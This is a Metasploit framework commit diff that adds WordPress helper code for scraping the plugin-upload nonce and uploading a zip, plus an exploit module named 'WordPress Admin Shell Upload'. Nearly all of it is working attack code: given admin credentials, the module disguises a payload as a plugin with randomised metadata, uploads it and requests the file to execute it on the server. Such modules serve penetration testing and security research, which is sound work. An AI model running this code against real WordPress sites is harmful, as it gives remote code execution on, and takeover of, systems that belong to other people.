Land rapid7#4808, Wordpress plugin upload module

firefart · firefart · commit 9223c23eb4d2 · 2015-02-21T23:01:15.000+01:00
diff --git a/lib/msf/http/wordpress.rb b/lib/msf/http/wordpress.rb
@@ -4,6 +4,7 @@
 module Msf
   module HTTP
     module Wordpress
+      require 'msf/http/wordpress/admin'
       require 'msf/http/wordpress/base'
       require 'msf/http/wordpress/helpers'
       require 'msf/http/wordpress/login'
@@ -14,6 +15,7 @@ module Wordpress
       require 'msf/http/wordpress/xml_rpc'
 
       include Msf::Exploit::Remote::HttpClient
+      include Msf::HTTP::Wordpress::Admin
       include Msf::HTTP::Wordpress::Base
       include Msf::HTTP::Wordpress::Helpers
       include Msf::HTTP::Wordpress::Login
diff --git a/lib/msf/http/wordpress/admin.rb b/lib/msf/http/wordpress/admin.rb
@@ -0,0 +1,43 @@
+# -*- coding: binary -*-
+
+module Msf::HTTP::Wordpress::Admin
+  # Uploads a plugin using a valid admin session.
+  #
+  # @param name [String] The name of the plugin
+  # @param zip [String] The plugin zip file as a string
+  # @param cookie [String] A valid admin session cookie
+  # @return [Boolean] true on success, false on error
+  def wordpress_upload_plugin(name, zip, cookie)
+    nonce = wordpress_helper_get_plugin_upload_nonce(cookie)
+    if nonce.nil?
+      vprint_error("#{peer} - Failed to acquire the plugin upload nonce")
+      return false
+    end
+    vprint_status("#{peer} - Acquired a plugin upload nonce: #{nonce}")
+
+    referer_uri = normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload')
+    data = Rex::MIME::Message.new
+    data.add_part(nonce, nil, nil, 'form-data; name="_wpnonce"')
+    data.add_part(referer_uri, nil, nil, 'form-data; name="_wp_http_referer"')
+    data.add_part(zip, 'application/octet-stream', 'binary', "form-data; name=\"pluginzip\"; filename=\"#{name}.zip\"")
+    data.add_part('Install Now', nil, nil, 'form-data; name="install-plugin-submit"')
+
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => wordpress_url_admin_update,
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => data.to_s,
+      'cookie'    => cookie,
+      'vars_get'  => { 'action' => 'upload-plugin' }
+    )
+
+    if res && res.code == 200
+      vprint_status("#{peer} - Uploaded plugin #{name}")
+      return true
+    else
+      vprint_error("#{peer} - Server responded with code #{res.code}") if res
+      vprint_error("#{peer} - Failed to upload plugin #{name}")
+      return false
+    end
+  end
+end
diff --git a/lib/msf/http/wordpress/helpers.rb b/lib/msf/http/wordpress/helpers.rb
@@ -119,4 +119,21 @@ def wordpress_helper_parse_location_header(res)
     path_from_uri(location)
   end
 
+  # Helper method to retrieve a valid plugin upload nonce.
+  #
+  # @param cookie [String] A valid admin session cookie
+  # @return [String,nil] The nonce, nil on error
+  def wordpress_helper_get_plugin_upload_nonce(cookie)
+    uri = normalize_uri(wordpress_url_backend, 'plugin-install.php')
+    options = {
+      'method'    => 'GET',
+      'uri'       => uri,
+      'cookie'    => cookie,
+      'vars_get'  => { 'tab' => 'upload' }
+    }
+    res = send_request_cgi(options)
+    if res && res.code == 200
+      return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
+    end
+  end
 end
diff --git a/lib/msf/http/wordpress/uris.rb b/lib/msf/http/wordpress/uris.rb
@@ -87,6 +87,12 @@ def wordpress_url_admin_post
     normalize_uri(wordpress_url_backend, 'admin-post.php')
   end
 
+  # Returns the Wordpress Admin Update URL
+  #
+  # @return [String] Wordpress Admin Update URL
+  def wordpress_url_admin_update
+    normalize_uri(wordpress_url_backend, 'update.php')
+  end  
 
   # Returns the Wordpress wp-content dir URL
   #
diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
@@ -0,0 +1,91 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Admin Shell Upload',
+      'Description'     => %q{
+          This module will generate a plugin, pack the payload into it
+          and upload it to a server running WordPress providing valid
+          admin credentials are used.
+        },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Rob Carr <rob[at]rastating.com>' # Metasploit module
+        ],
+      'DisclosureDate'  => 'Feb 21 2015',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+      ], self.class)
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def generate_plugin(plugin_name, payload_name)
+    plugin_script = %Q{<?php
+/**
+ * Plugin Name: #{plugin_name}
+ * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
+ * Author: #{Rex::Text.rand_text_alpha(10)}
+ * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
+ * License: GPL2
+ */
+?>}
+
+    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
+    zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
+    zip
+  end
+
+  def exploit
+    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
+
+    print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+    print_good("#{peer} - Authenticated with WordPress")
+
+    print_status("#{peer} - Preparing payload...")
+    plugin_name = Rex::Text.rand_text_alpha(10)
+    payload_name = "#{Rex::Text.rand_text_alpha(10)}"
+    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+    zip = generate_plugin(plugin_name, payload_name)
+
+    print_status("#{peer} - Uploading payload...")
+    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)
+    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
+
+    print_status("#{peer} - Executing the payload at #{payload_uri}...")
+    register_files_for_cleanup("#{payload_name}.php")
+    register_files_for_cleanup("#{plugin_name}.php")
+    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
+  end
+end
